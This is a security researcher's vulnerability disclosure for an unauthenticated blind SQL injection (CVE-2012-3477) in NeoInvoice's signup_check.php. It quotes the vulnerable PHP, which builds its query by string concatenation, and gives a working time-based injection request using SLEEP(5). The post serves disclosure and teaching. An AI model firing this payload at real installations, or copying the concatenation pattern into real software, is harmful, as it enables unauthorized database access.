Adam Caudill

Developer, security researcher, and technical elitist with a strong interest in privacy and journalism.

NeoInvoice Blind SQL Injection (CVE-2012-3477)

NeoInvoice is a multi-tenant open source invoicing system, that currently contains an unauthenticated blind SQL injection condition in signup_check.php. The input for the value field isn’t being properly sanitized, and is used in string concatenation to create the SQL query:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?php
require_once("config.php");

if (isset($_GET['field']) && ($_GET['field'] == 'username' || $_GET['field'] == 'email')) {
  $field = $_GET['field'];
  $table = 'user';
  $taken = '0';
  $not_taken = '1';
} else if (isset($_GET['field']) && $_GET['field'] == 'coupon') {
  $field = 'name';
  $table = 'coupon';
  $taken = '1';
  $not_taken = '0';
} else {
  die("<div class=\"error\">Invalid Field</div>");
}
if (!isset($_GET['value'])) {
  die("<div class=\"error\">Invalid Value</div>");
}
$value = preg_replace("[^a-zA-Z0-9_.\-\*\/\+\, @]", "", $_GET['value']);
if ($value != $_GET['value']) {
  die("<div class=\"error\">Invalid Value</div>");
}

$connect = mysql_connect(MYSQL_HOSTNAME, MYSQL_USERNAME, MYSQL_PASSWORD);
if (!$connect) {
  die("<div class=\"error\">" . mysql_error() . "</div>");
}
$query = "SELECT $field FROM $table WHERE $field = '$value' LIMIT 1";

mysql_select_db(MYSQL_DATABASE, $connect);
$result = mysql_query($query, $connect);
if (mysql_num_rows($result)) {
  echo $taken;
} else {
  echo $not_taken;
}

Line #29 there is the key, by concatenating untrusted data into the SQL query, it has made SQL injection trivial. This vulnerability can be demonstrated with the following request:

signup_check.php?field=username&value='+OR+SLEEP(5)+OR+'

This results in the following query being executed:

SELECT username FROM user WHERE username = '' OR SLEEP(5) OR '' LIMIT 1

The author has been notified, but has yet to respond. Based on the one open ticket for the project, there’s likely other possible attack vectors.